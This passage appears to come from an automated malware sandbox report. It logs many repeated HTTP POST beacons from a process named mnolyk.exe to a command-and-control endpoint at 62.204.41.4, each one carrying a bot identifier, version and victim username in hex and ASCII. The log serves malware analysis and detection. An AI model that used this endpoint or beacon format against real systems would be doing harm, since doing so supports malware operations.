                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:07.278188944 CET | 359 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:07 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      245 | 192.168.2.7 | 49940 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:07.464493990 CET | 360 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:07.529371977 CET | 360 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:07 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      246 | 192.168.2.7 | 49941 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:07.714680910 CET | 361 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:07.778090000 CET | 361 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:07 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      247 | 192.168.2.7 | 49942 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:07.961390018 CET | 362 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:08.025127888 CET | 362 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:07 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      248 | 192.168.2.7 | 49943 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:08.214342117 CET | 363 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:08.279133081 CET | 363 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:08 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      249 | 192.168.2.7 | 49944 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:08.460140944 CET | 364 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:08.525207043 CET | 364 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:08 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      25 | 192.168.2.7 | 49719 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:07.624988079 CET | 129 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:07.686675072 CET | 129 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:07 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      250 | 192.168.2.7 | 49945 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:08.700274944 CET | 365 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:08.764461040 CET | 365 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:08 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      251 | 192.168.2.7 | 49946 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:08.944668055 CET | 366 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:09.008547068 CET | 366 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:08 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      252 | 192.168.2.7 | 49947 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:09.176994085 CET | 367 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:09.240406036 CET | 367 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:09 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      253 | 192.168.2.7 | 49948 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:09.418494940 CET | 368 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:09.483279943 CET | 368 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:09 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      254 | 192.168.2.7 | 49949 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:09.663717985 CET | 369 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:09.727545977 CET | 369 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:09 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      255 | 192.168.2.7 | 49950 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:09.942678928 CET | 370 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:10.006781101 CET | 370 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:09 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      256 | 192.168.2.7 | 49951 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:10.180583954 CET | 371 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:10.243530989 CET | 371 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:10 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      257 | 192.168.2.7 | 49952 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:10.427882910 CET | 372 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:10.490973949 CET | 372 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:10 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      258 | 192.168.2.7 | 49953 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:10.664702892 CET | 373 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:10.728537083 CET | 373 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:10 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      259 | 192.168.2.7 | 49954 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:10.899375916 CET | 374 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:10.962054968 CET | 374 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:10 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      26 | 192.168.2.7 | 49720 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:07.869854927 CET | 130 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:07.934511900 CET | 130 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:07 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      260 | 192.168.2.7 | 49955 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:11.133835077 CET | 375 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:11.200885057 CET | 375 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:11 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


